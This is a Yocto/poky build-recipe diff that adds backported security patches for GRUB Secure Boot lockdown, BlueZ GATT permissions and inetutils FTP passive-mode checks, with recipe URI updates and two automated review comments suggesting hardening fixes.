@@ -0,0 +1,62 @@ +From 6993cce7c3a9d15e6573845f455d2f0de424a717 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas <javierm@redhat.com> +Date: Wed, 24 Feb 2021 15:03:26 +0100 +Subject: [PATCH] gdb: Restrict GDB access when locked down + +The gdbstub* commands allow to start and control a GDB stub running on +local host that can be used to connect from a remote debugger. Restrict +this functionality when the GRUB is locked down. + +Signed-off-by: Javier Martinez Canillas <javierm@redhat.com> +Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=508270838998f151a82e9c13e7cb8a470a2dc23d] +CVE: CVE-2020-27779 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + grub-core/gdb/gdb.c | 32 ++++++++++++++++++-------------- + 1 file changed, 18 insertions(+), 14 deletions(-) + +diff --git a/grub-core/gdb/gdb.c b/grub-core/gdb/gdb.c +index 847a1e1..1818cb6 100644 +--- a/grub-core/gdb/gdb.c ++++ b/grub-core/gdb/gdb.c +@@ -75,20 +75,24 @@ static grub_command_t cmd, cmd_stop, cmd_break; + GRUB_MOD_INIT (gdb) + { + grub_gdb_idtinit (); +- cmd = grub_register_command ("gdbstub", grub_cmd_gdbstub, +- N_("PORT"), +- /* TRANSLATORS: GDB stub is a small part of +- GDB functionality running on local host +- which allows remote debugger to +- connect to it. */ +- N_("Start GDB stub on given port")); +- cmd_break = grub_register_command ("gdbstub_break", grub_cmd_gdb_break, +- /* TRANSLATORS: this refers to triggering +- a breakpoint so that the user will land +- into GDB. */ +- 0, N_("Break into GDB")); +- cmd_stop = grub_register_command ("gdbstub_stop", grub_cmd_gdbstop, +- 0, N_("Stop GDB stub")); ++ cmd = grub_register_command_lockdown ("gdbstub", grub_cmd_gdbstub, ++ N_("PORT"), ++ /* ++ * TRANSLATORS: GDB stub is a small part of ++ * GDB functionality running on local host ++ * which allows remote debugger to ++ * connect to it. 
++ */ ++ N_("Start GDB stub on given port")); ++ cmd_break = grub_register_command_lockdown ("gdbstub_break", grub_cmd_gdb_break, ++ /* ++ * TRANSLATORS: this refers to triggering ++ * a breakpoint so that the user will land ++ * into GDB. ++ */ ++ 0, N_("Break into GDB")); ++ cmd_stop = grub_register_command_lockdown ("gdbstub_stop", grub_cmd_gdbstop, ++ 0, N_("Stop GDB stub")); + } + + GRUB_MOD_FINI (gdb) diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch new file mode 100644 index 0000000000..474826ade5 --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch 
@@ -0,0 +1,61 @@ +From 73f214761cff76a18a2a867976bdd3a9adb00b67 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas <javierm@redhat.com> +Date: Wed, 24 Feb 2021 14:44:38 +0100 +Subject: [PATCH] loader/xnu: Don't allow loading extension and packages when + locked down + +The shim_lock verifier validates the XNU kernels but no its extensions +and packages. Prevent these to be loaded when the GRUB is locked down. + +Signed-off-by: Javier Martinez Canillas <javierm@redhat.com> +Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9c5565135f12400a925ee901b25984e7af4442f5] +CVE: CVE-2020-27779 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + grub-core/loader/xnu.c | 31 +++++++++++++++++-------------- + 1 file changed, 17 insertions(+), 14 deletions(-) + +diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c +index 77d7060..07232d2 100644 +--- a/grub-core/loader/xnu.c ++++ b/grub-core/loader/xnu.c +@@ -1482,20 +1482,23 @@ GRUB_MOD_INIT(xnu) + N_("Load XNU image.")); + cmd_kernel64 = grub_register_command ("xnu_kernel64", grub_cmd_xnu_kernel64, + 0, N_("Load 64-bit XNU image.")); +- cmd_mkext = grub_register_command ("xnu_mkext", grub_cmd_xnu_mkext, 0, +- N_("Load XNU extension package.")); +- cmd_kext = grub_register_command ("xnu_kext", grub_cmd_xnu_kext, 0, +- N_("Load XNU extension.")); +- cmd_kextdir = grub_register_command ("xnu_kextdir", grub_cmd_xnu_kextdir, +- /* TRANSLATORS: OSBundleRequired is a +- variable name in xnu extensions +- manifests. It behaves mostly like +- GNU/Linux runlevels. +- */ +- N_("DIRECTORY [OSBundleRequired]"), +- /* TRANSLATORS: There are many extensions +- in extension directory. 
*/ +- N_("Load XNU extension directory.")); ++ cmd_mkext = grub_register_command_lockdown ("xnu_mkext", grub_cmd_xnu_mkext, 0, ++ N_("Load XNU extension package.")); ++ cmd_kext = grub_register_command_lockdown ("xnu_kext", grub_cmd_xnu_kext, 0, ++ N_("Load XNU extension.")); ++ cmd_kextdir = grub_register_command_lockdown ("xnu_kextdir", grub_cmd_xnu_kextdir, ++ /* ++ * TRANSLATORS: OSBundleRequired is ++ * a variable name in xnu extensions ++ * manifests. It behaves mostly like ++ * GNU/Linux runlevels. ++ */ ++ N_("DIRECTORY [OSBundleRequired]"), ++ /* ++ * TRANSLATORS: There are many extensions ++ * in extension directory. ++ */ ++ N_("Load XNU extension directory.")); + cmd_ramdisk = grub_register_command ("xnu_ramdisk", grub_cmd_xnu_ramdisk, 0, + /* TRANSLATORS: ramdisk here isn't identifier. It can be translated. */ + N_("Load XNU ramdisk. " diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch new file mode 100644 index 0000000000..e5d372a2b1 --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch 
@@ -0,0 +1,65 @@ +From dcc5a434e59f721b03cc809db0375a24aa2ac6d0 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas <javierm@redhat.com> +Date: Sat, 7 Nov 2020 01:03:18 +0100 +Subject: [PATCH] docs: Document the cutmem command + +The command is not present in the docs/grub.texi user documentation. + +Reported-by: Daniel Kiper <daniel.kiper@oracle.com> +Signed-off-by: Javier Martinez Canillas <javierm@redhat.com> +Signed-off-by: Daniel Kiper <daniel.kiper@oracle.com> +Reviewed-by: Javier Martinez Canillas <javierm@redhat.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=f05e79a0143beb2d9a482a3ebf4fe0ce76778122] +CVE: CVE-2020-27779 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + docs/grub.texi | 21 +++++++++++++++++++++ + 1 file changed, 21 insertions(+) + +diff --git a/docs/grub.texi b/docs/grub.texi +index ccf1908..ae85f55 100644 +--- a/docs/grub.texi ++++ b/docs/grub.texi +@@ -3892,6 +3892,7 @@ you forget a command, you can run the command @command{help} + * cpuid:: Check for CPU features + * crc:: Compute or check CRC32 checksums + * cryptomount:: Mount a crypto device ++* cutmem:: Remove memory regions + * date:: Display or set current date and time + * devicetree:: Load a device tree blob + * distrust:: Remove a pubkey from trusted keys +@@ -4051,6 +4052,8 @@ this page is to be filtered. This syntax makes it easy to represent patterns + that are often result of memory damage, due to physical distribution of memory + cells. + ++The command is similar to @command{cutmem} command. ++ + Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}). + This prevents removing EFI memory regions to potentially subvert the + security mechanisms provided by the UEFI secure boot. +@@ -4214,6 +4217,24 @@ GRUB suports devices encrypted using LUKS and geli. Note that necessary modules + be used. 
+ @end deffn + ++@node cutmem ++@subsection cutmem ++ ++@deffn Command cutmem from[K|M|G] to[K|M|G] ++Remove any memory regions in specified range. ++@end deffn ++ ++This command notifies the memory manager that specified regions of RAM ought to ++be filtered out. This remains in effect after a payload kernel has been loaded ++by GRUB, as long as the loaded kernel obtains its memory map from GRUB. Kernels ++that support this include Linux, GNU Mach, the kernel of FreeBSD and Multiboot ++kernels in general. ++ ++The command is similar to @command{badram} command. ++ ++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}). ++ This prevents removing EFI memory regions to potentially subvert the ++ security mechanisms provided by the UEFI secure boot. + + @node date + @subsection date diff --git a/poky/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch b/poky/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch new file mode 100644 index 0000000000..504352b4e3 --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch 
@@ -0,0 +1,107 @@ +From b5a6aa7d77439bfeb75f200abffe15c6f685c907 Mon Sep 17 00:00:00 2001 +From: Matthew Garrett <mjg@redhat.com> +Date: Mon, 13 Jan 2014 12:13:09 +0000 +Subject: Don't permit loading modules on UEFI secure boot + +Author: Colin Watson <cjwatson@ubuntu.com> +Origin: vendor, http://pkgs.fedoraproject.org/cgit/grub2.git/tree/grub-2.00-no-insmod-on-sb.patch +Forwarded: no +Last-Update: 2013-12-25 + +Patch-Name: no-insmod-on-sb.patch + +Upstream-Status: Inappropriate [other, https://salsa.debian.org/grub-team/grub/-/blob/debian/2.04-20/debian/patches/no-insmod-on-sb.patch] + +Backport of a Debian (and Fedora) patch implementing a way to get secure boot status +for CVE-2020-14372_4.patch. The upstream solution has too many dependencies to backport. +Source: https://salsa.debian.org/grub-team/grub/-/blob/debian/2.04-20/debian/patches/no-insmod-on-sb.patch + +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + grub-core/kern/dl.c | 13 +++++++++++++ + grub-core/kern/efi/efi.c | 28 ++++++++++++++++++++++++++++ + include/grub/efi/efi.h | 1 + + 3 files changed, 42 insertions(+) + +diff --git a/grub-core/kern/dl.c b/grub-core/kern/dl.c +index 48eb5e7b6..074dfc3c6 100644 +--- a/grub-core/kern/dl.c ++++ b/grub-core/kern/dl.c +@@ -38,6 +38,10 @@ + #define GRUB_MODULES_MACHINE_READONLY + #endif + ++#ifdef GRUB_MACHINE_EFI ++#include <grub/efi/efi.h> ++#endif ++ + + + #pragma GCC diagnostic ignored "-Wcast-align" +@@ -686,6 +690,15 @@ grub_dl_load_file (const char *filename) + void *core = 0; + grub_dl_t mod = 0; + ++#ifdef GRUB_MACHINE_EFI ++ if (grub_efi_secure_boot ()) ++ { ++ grub_error (GRUB_ERR_ACCESS_DENIED, ++ "Secure Boot forbids loading module from %s", filename); ++ return 0; ++ } ++#endif ++ + grub_boot_time ("Loading module %s", filename); + + file = grub_file_open (filename, GRUB_FILE_TYPE_GRUB_MODULE); +diff --git a/grub-core/kern/efi/efi.c b/grub-core/kern/efi/efi.c +index 6e1ceb905..96204e39b 100644 +--- a/grub-core/kern/efi/efi.c 
++++ b/grub-core/kern/efi/efi.c +@@ -273,6 +273,34 @@ grub_efi_get_variable (const char *var, const grub_efi_guid_t *guid, + return NULL; + } + ++grub_efi_boolean_t ++grub_efi_secure_boot (void) ++{ ++ grub_efi_guid_t efi_var_guid = GRUB_EFI_GLOBAL_VARIABLE_GUID; ++ grub_size_t datasize; ++ char *secure_boot = NULL; ++ char *setup_mode = NULL; ++ grub_efi_boolean_t ret = 0; ++ ++ secure_boot = grub_efi_get_variable ("SecureBoot", &efi_var_guid, &datasize); ++ ++ if (datasize != 1 || !secure_boot) ++ goto out; ++ ++ setup_mode = grub_efi_get_variable ("SetupMode", &efi_var_guid, &datasize); ++ ++ if (datasize != 1 || !setup_mode) ++ goto out; ++ ++ if (*secure_boot && !*setup_mode) ++ ret = 1; ++ ++ out: ++ grub_free (secure_boot); ++ grub_free (setup_mode); ++ return ret; ++} ++ + #pragma GCC diagnostic ignored "-Wcast-align" + + /* Search the mods section from the PE32/PE32+ image. This code uses +diff --git a/include/grub/efi/efi.h b/include/grub/efi/efi.h +index e90e00dc4..a237952b3 100644 +--- a/include/grub/efi/efi.h ++++ b/include/grub/efi/efi.h +@@ -82,6 +82,7 @@ EXPORT_FUNC (grub_efi_set_variable) (const char *var, + const grub_efi_guid_t *guid, + void *data, + grub_size_t datasize); ++grub_efi_boolean_t EXPORT_FUNC (grub_efi_secure_boot) (void); + int + EXPORT_FUNC (grub_efi_compare_device_paths) (const grub_efi_device_path_t *dp1, + const grub_efi_device_path_t *dp2); diff --git a/poky/meta/recipes-bsp/grub/grub2.inc b/poky/meta/recipes-bsp/grub/grub2.inc index 180e3752f8..db7c23a84a 100644 --- a/poky/meta/recipes-bsp/grub/grub2.inc +++ b/poky/meta/recipes-bsp/grub/grub2.inc 
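Review bot: In grub_efi_secure_boot(), `datasize` is declared without an initializer and is read before the pointer returned by grub_efi_get_variable() is tested. Whether grub_efi_get_variable() writes the size on its failure path is not visible in this hunk, so the NULL test should come first: `if (!secure_boot || datasize != 1)` and likewise `if (!setup_mode || datasize != 1)`. Every failure path here returns 0, so a variable that cannot be read or has an unexpected size is treated as Secure Boot being off and grub_dl_load_file() goes on to load the module. That fail-open choice deserves a comment above the function, for example `/* Returns 0 (not enforced) when SecureBoot/SetupMode cannot be read. */`.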
@@ -31,6 +31,20 @@ SRC_URI = "${GNU_MIRROR}/grub/grub-${PV}.tar.gz \ file://CVE-2020-15706-script-Avoid-a-use-after-free-when-redefining-a-func.patch \ file://CVE-2020-15707-linux-Fix-integer-overflows-in-initrd-size-handling.patch \ file://determinism.patch \ + file://no-insmod-on-sb.patch \ + file://CVE-2020-14372_1.patch \ + file://CVE-2020-14372_2.patch \ + file://CVE-2020-14372_3.patch \ + file://CVE-2020-14372_4.patch \ + file://CVE-2020-14372_5.patch \ + file://CVE-2020-14372.patch \ + file://CVE-2020-27779.patch \ + file://CVE-2020-27779_2.patch \ + file://CVE-2020-27779_3.patch \ + file://CVE-2020-27779_4.patch \ + file://CVE-2020-27779_5.patch \ + file://CVE-2020-27779_6.patch \ + file://CVE-2020-27779_7.patch \ " SRC_URI[md5sum] = "5ce674ca6b2612d8939b9e6abed32934" SRC_URI[sha256sum] = "f10c85ae3e204dbaec39ae22fa3c5e99f0665417e91c2cb49b7e5031658ba6ea" diff --git a/poky/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch b/poky/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch new file mode 100644 index 0000000000..47c7ec4170 --- /dev/null +++ b/poky/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch 
@@ -0,0 +1,36 @@ +From ecdcf0df6c28c65ca6d1e5638726e13e373c76c5 Mon Sep 17 00:00:00 2001 +From: Khem Raj <raj.khem@gmail.com> +Date: Wed, 11 Nov 2020 22:58:55 -0800 +Subject: [PATCH] Fix cross compilation using autoconf detected AR + +currently its using 'ar' program from build host, which is not expected, +we need to respect AR passed in environment + +Upstream-Status: Pending + +Signed-off-by: Khem Raj <raj.khem@gmail.com> +--- + configure.in | 7 +++++++ + 1 file changed, 7 insertions(+) + +diff --git a/configure.in b/configure.in +index 4ddbe8b..b7c3c31 100644 +--- a/configure.in ++++ b/configure.in +@@ -84,6 +84,13 @@ AC_ARG_ENABLE(syslog, + ]) + + dnl Checks for programs. ++m4_ifndef([AC_PROG_AR],[dnl ++ AN_MAKEVAR([AR], [AC_PROG_AR]) ++ AN_PROGRAM([ar], [AC_PROG_AR]) ++ AC_DEFUN([AC_PROG_AR], ++ [AC_CHECK_TOOL(AR, ar, :)]) ++]) ++AC_PROG_AR + AC_PROG_CC + AC_PROG_GCC_TRADITIONAL + dnl AC_PROG_INSTALL included in AM_INIT_AUTOMAKE +-- +2.29.2 + diff --git a/poky/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb b/poky/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb index 4129237c59..54c431eeb3 100644 --- a/poky/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb +++ b/poky/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb @@ -19,6 +19,7 @@ SRC_URI = "http://www.ohse.de/uwe/releases/lrzsz-${PV}.tar.gz \ file://lrzsz-check-locale.h.patch \ file://cve-2018-10195.patch \ file://include.patch \ + file://0001-Fix-cross-compilation-using-autoconf-detected-AR.patch \ " SRC_URI[md5sum] = "b5ce6a74abc9b9eb2af94dffdfd372a4" diff --git a/poky/meta/recipes-bsp/opensbi/opensbi_0.6.bb b/poky/meta/recipes-bsp/opensbi/opensbi_0.6.bb index d8910c0ff1..972d8de17d 100644 --- a/poky/meta/recipes-bsp/opensbi/opensbi_0.6.bb +++ b/poky/meta/recipes-bsp/opensbi/opensbi_0.6.bb 
@@ -9,7 +9,7 @@ require opensbi-payloads.inc inherit autotools-brokensep deploy SRCREV = "ac5e821d50be631f26274765a59bc1b444ffd862" -SRC_URI = "git://github.com/riscv/opensbi.git \ +SRC_URI = "git://github.com/riscv/opensbi.git;branch=master;protocol=https \ file://0001-Makefile-Don-t-specify-mabi-or-march.patch \ " diff --git a/poky/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb b/poky/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb index 613e3161fb..8234b86162 100644 --- a/poky/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb +++ b/poky/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb @@ -10,7 +10,7 @@ LICENSE = "LGPL-2.1" LIC_FILES_CHKSUM = "file://Licenses/lgpl-2.1.txt;md5=4fbd65380cdd255951079008b364516c" SECTION = "libs" -SRC_URI = "git://github.com/sbabic/libubootenv;protocol=https" +SRC_URI = "git://github.com/sbabic/libubootenv;protocol=https;branch=master" SRCREV = "824551ac77bab1d0f7ae34d7a7c77b155240e754" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-bsp/u-boot/u-boot-common.inc b/poky/meta/recipes-bsp/u-boot/u-boot-common.inc index 198ed52c7c..a001190292 100644 --- a/poky/meta/recipes-bsp/u-boot/u-boot-common.inc +++ b/poky/meta/recipes-bsp/u-boot/u-boot-common.inc @@ -14,7 +14,7 @@ PE = "1" # repo during parse SRCREV = "303f8fed261020c1cb7da32dad63b610bf6873dd" -SRC_URI = "git://git.denx.de/u-boot.git \ +SRC_URI = "git://git.denx.de/u-boot.git;branch=master \ file://remove-redundant-yyloc-global.patch \ file://CVE-2020-8432.patch \ file://CVE-2020-10648-1.patch \ diff --git a/poky/meta/recipes-connectivity/bind/bind_9.11.32.bb b/poky/meta/recipes-connectivity/bind/bind_9.11.35.bb index 9feebe5ae2..4652529623 100644 --- a/poky/meta/recipes-connectivity/bind/bind_9.11.32.bb +++ b/poky/meta/recipes-connectivity/bind/bind_9.11.35.bb 
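Review bot: The u-boot-common.inc hunk adds `branch=master` but, unlike the opensbi and libubootenv hunks on this page, no `protocol=https`, so this fetch stays on the unauthenticated, unencrypted git:// transport. The pinned SRCREV limits what a tampered transfer can achieve, but the recipes would be consistent, and the fetch authenticated, with `SRC_URI = "git://git.denx.de/u-boot.git;branch=master;protocol=https \`, provided the server offers HTTPS for this repository. If it does not, a short comment above SRC_URI saying so would explain the exception.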
@@ -21,7 +21,7 @@ SRC_URI = "https://ftp.isc.org/isc/bind9/${PV}/${BPN}-${PV}.tar.gz \ file://0001-avoid-start-failure-with-bind-user.patch \ " -SRC_URI[sha256sum] = "cbf8cb4b74dd1452d97c3a2a8c625ea346df8516b4b3508ef07443121a591342" +SRC_URI[sha256sum] = "1c882705827b6aafa45d917ae3b20eccccc8d5df3c4477df44b04382e6c47562" UPSTREAM_CHECK_URI = "https://ftp.isc.org/isc/bind9/" # stay at 9.11 until 9.16, from 9.16 follow the ESV versions divisible by 4 diff --git a/poky/meta/recipes-connectivity/bluez5/bluez5.inc b/poky/meta/recipes-connectivity/bluez5/bluez5.inc index 202a14dee0..34796fdd20 100644 --- a/poky/meta/recipes-connectivity/bluez5/bluez5.inc +++ b/poky/meta/recipes-connectivity/bluez5/bluez5.inc @@ -52,6 +52,7 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/bluetooth/bluez-${PV}.tar.xz \ ${@bb.utils.contains('DISTRO_FEATURES', 'systemd', '', 'file://0001-Allow-using-obexd-without-systemd-in-the-user-sessio.patch', d)} \ file://0001-tests-add-a-target-for-building-tests-without-runnin.patch \ file://0001-test-gatt-Fix-hung-issue.patch \ + file://CVE-2021-0129.patch \ file://CVE-2021-3588.patch \ " S = "${WORKDIR}/bluez-${PV}" diff --git a/poky/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch b/poky/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch new file mode 100644 index 0000000000..b39730dc10 --- /dev/null +++ b/poky/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch 
@@ -0,0 +1,109 @@ +From 00da0fb4972cf59e1c075f313da81ea549cb8738 Mon Sep 17 00:00:00 2001 +From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com> +Date: Tue, 2 Mar 2021 11:38:33 -0800 +Subject: shared/gatt-server: Fix not properly checking for secure flags + +When passing the mask to check_permissions all valid permissions for +the operation must be set including BT_ATT_PERM_SECURE flags. + +Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/patch/?id=00da0fb4972cf59e1c075f313da81ea549cb8738] +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +CVE: CVE-2021-0129 +--- + src/shared/att-types.h | 8 ++++++++ + src/shared/gatt-server.c | 25 +++++++------------------ + 2 files changed, 15 insertions(+), 18 deletions(-) + +diff --git a/src/shared/att-types.h b/src/shared/att-types.h +index 7108b4e94..3adc05d9e 100644 +--- a/src/shared/att-types.h ++++ b/src/shared/att-types.h +@@ -129,6 +129,14 @@ struct bt_att_pdu_error_rsp { + #define BT_ATT_PERM_WRITE_SECURE 0x0200 + #define BT_ATT_PERM_SECURE (BT_ATT_PERM_READ_SECURE | \ + BT_ATT_PERM_WRITE_SECURE) ++#define BT_ATT_PERM_READ_MASK (BT_ATT_PERM_READ | \ ++ BT_ATT_PERM_READ_AUTHEN | \ ++ BT_ATT_PERM_READ_ENCRYPT | \ ++ BT_ATT_PERM_READ_SECURE) ++#define BT_ATT_PERM_WRITE_MASK (BT_ATT_PERM_WRITE | \ ++ BT_ATT_PERM_WRITE_AUTHEN | \ ++ BT_ATT_PERM_WRITE_ENCRYPT | \ ++ BT_ATT_PERM_WRITE_SECURE) + + /* GATT Characteristic Properties Bitfield values */ + #define BT_GATT_CHRC_PROP_BROADCAST 0x01 +diff --git a/src/shared/gatt-server.c b/src/shared/gatt-server.c +index b5f7de7dc..970c35f94 100644 +--- a/src/shared/gatt-server.c ++++ b/src/shared/gatt-server.c +@@ -444,9 +444,7 @@ static void process_read_by_type(struct async_read_op *op) + return; + } + +- ecode = check_permissions(server, attr, BT_ATT_PERM_READ | +- BT_ATT_PERM_READ_AUTHEN | +- BT_ATT_PERM_READ_ENCRYPT); ++ ecode = check_permissions(server, attr, BT_ATT_PERM_READ_MASK); + if (ecode) + goto error; + +@@ -811,9 +809,7 @@ 
static void write_cb(struct bt_att_chan *chan, uint8_t opcode, const void *pdu, + (opcode == BT_ATT_OP_WRITE_REQ) ? "Req" : "Cmd", + handle); + +- ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE | +- BT_ATT_PERM_WRITE_AUTHEN | +- BT_ATT_PERM_WRITE_ENCRYPT); ++ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK); + if (ecode) + goto error; + +@@ -913,9 +909,7 @@ static void handle_read_req(struct bt_att_chan *chan, + opcode == BT_ATT_OP_READ_BLOB_REQ ? "Blob " : "", + handle); + +- ecode = check_permissions(server, attr, BT_ATT_PERM_READ | +- BT_ATT_PERM_READ_AUTHEN | +- BT_ATT_PERM_READ_ENCRYPT); ++ ecode = check_permissions(server, attr, BT_ATT_PERM_READ_MASK); + if (ecode) + goto error; + +@@ -1051,9 +1045,8 @@ static void read_multiple_complete_cb(struct gatt_db_attribute *attr, int err, + goto error; + } + +- ecode = check_permissions(data->server, next_attr, BT_ATT_PERM_READ | +- BT_ATT_PERM_READ_AUTHEN | +- BT_ATT_PERM_READ_ENCRYPT); ++ ecode = check_permissions(data->server, next_attr, ++ BT_ATT_PERM_READ_MASK); + if (ecode) + goto error; + +@@ -1129,9 +1122,7 @@ static void read_multiple_cb(struct bt_att_chan *chan, uint8_t opcode, + goto error; + } + +- ecode = check_permissions(data->server, attr, BT_ATT_PERM_READ | +- BT_ATT_PERM_READ_AUTHEN | +- BT_ATT_PERM_READ_ENCRYPT); ++ ecode = check_permissions(data->server, attr, BT_ATT_PERM_READ_MASK); + if (ecode) + goto error; + +@@ -1308,9 +1299,7 @@ static void prep_write_cb(struct bt_att_chan *chan, uint8_t opcode, + util_debug(server->debug_callback, server->debug_data, + "Prep Write Req - handle: 0x%04x", handle); + +- ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE | +- BT_ATT_PERM_WRITE_AUTHEN | +- BT_ATT_PERM_WRITE_ENCRYPT); ++ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK); + if (ecode) + goto error; + +-- +cgit 1.2.3-1.el7 + 
diff --git a/poky/meta/recipes-connectivity/connman/connman-gnome_0.7.bb b/poky/meta/recipes-connectivity/connman/connman-gnome_0.7.bb index 778bf50191..24593d6258 100644 --- a/poky/meta/recipes-connectivity/connman/connman-gnome_0.7.bb +++ b/poky/meta/recipes-connectivity/connman/connman-gnome_0.7.bb @@ -10,7 +10,7 @@ DEPENDS = "gtk+3 dbus-glib dbus-glib-native intltool-native gettext-native" # 0.7 tag SRCREV = "cf3c325b23dae843c5499a113591cfbc98acb143" -SRC_URI = "git://github.com/connectivity/connman-gnome.git \ +SRC_URI = "git://github.com/connectivity/connman-gnome.git;branch=master;protocol=https \ file://0001-Removed-icon-from-connman-gnome-about-applet.patch \ file://null_check_for_ipv4_config.patch \ file://images/* \ diff --git a/poky/meta/recipes-connectivity/connman/connman.inc b/poky/meta/recipes-connectivity/connman/connman.inc index 55e5bf97c7..c495ae29ad 100644 --- a/poky/meta/recipes-connectivity/connman/connman.inc +++ b/poky/meta/recipes-connectivity/connman/connman.inc @@ -15,6 +15,8 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \ inherit autotools pkgconfig systemd update-rc.d update-alternatives +CVE_PRODUCT = "connman connection_manager" + DEPENDS = "dbus glib-2.0 ppp" INC_PR = "r20" diff --git a/poky/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch b/poky/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch new file mode 100644 index 0000000000..54252d6bc7 --- /dev/null +++ b/poky/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch 
@@ -0,0 +1,67 @@ +From 4e355804d57d5686defc363c70f81e6f58cd08f0 Mon Sep 17 00:00:00 2001 +From: Simon Josefsson <simon@josefsson.org> +Date: Fri, 17 Dec 2021 21:52:18 -0800 +Subject: [PATCH] ftp: check that PASV/LSPV addresses match. + +* NEWS: Mention change. +* ftp/ftp.c (initconn): Validate returned addresses. + +CVE: CVE-2021-40491 + +Upstream-Status: Backport +[https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=58cb043b190fd04effdaea7c9403416b436e50dd] + +Signed-off-by: Minjae Kim <flowergom@gmail.com> +--- + ftp/ftp.c | 21 +++++++++++++++++++++ + 1 file changed, 21 insertions(+) + +diff --git a/ftp/ftp.c b/ftp/ftp.c +index 9813586..7c72cb2 100644 +--- a/ftp/ftp.c ++++ b/ftp/ftp.c +@@ -1344,6 +1344,13 @@ initconn (void) + uint32_t *pu32 = (uint32_t *) &data_addr_sa4->sin_addr.s_addr; + pu32[0] = htonl ( (h[0] << 24) | (h[1] << 16) | (h[2] << 8) | h[3]); + } ++ if (data_addr_sa4->sin_addr.s_addr ++ != ((struct sockaddr_in *) &hisctladdr)->sin_addr.s_addr) ++ { ++ printf ("Passive mode address mismatch.\n"); ++ (void) command ("ABOR"); /* Cancel any open connection. */ ++ goto bad; ++ } + } /* LPSV IPv4 */ + else /* IPv6 */ + { +@@ -1374,6 +1381,13 @@ initconn (void) + pu32[2] = htonl ( (h[8] << 24) | (h[9] << 16) | (h[10] << 8) | h[11]); + pu32[3] = htonl ( (h[12] << 24) | (h[13] << 16) | (h[14] << 8) | h[15]); + } ++ if (data_addr_sa6->sin6_addr.s6_addr ++ != ((struct sockaddr_in6 *) &hisctladdr)->sin6_addr.s6_addr) ++ { ++ printf ("Passive mode address mismatch.\n"); ++ (void) command ("ABOR"); /* Cancel any open connection. 
*/ ++ goto bad; ++ } + } /* LPSV IPv6 */ + } + else /* !EPSV && !LPSV */ +@@ -1394,6 +1408,13 @@ initconn (void) + | ((a2 & 0xff) << 8) | (a3 & 0xff) ); + data_addr_sa4->sin_port = + htons (((p0 & 0xff) << 8) | (p1 & 0xff)); ++ if (data_addr_sa4->sin_addr.s_addr ++ != ((struct sockaddr_in *) &hisctladdr)->sin_addr.s_addr) ++ { ++ printf ("Passive mode address mismatch.\n"); ++ (void) command ("ABOR"); /* Cancel any open connection. */ ++ goto bad; ++ } + } /* PASV */ + else + { +-- +2.25.1 + diff --git a/poky/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb b/poky/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb index cc9410b94e..f4450e19f4 100644 --- a/poky/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb +++ b/poky/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb @@ -23,6 +23,7 @@ SRC_URI = "${GNU_MIRROR}/inetutils/inetutils-${PV}.tar.gz \ file://inetutils-only-check-pam_appl.h-when-pam-enabled.patch \ file://0001-rcp-fix-to-work-with-large-files.patch \ file://fix-buffer-fortify-tfpt.patch \ + 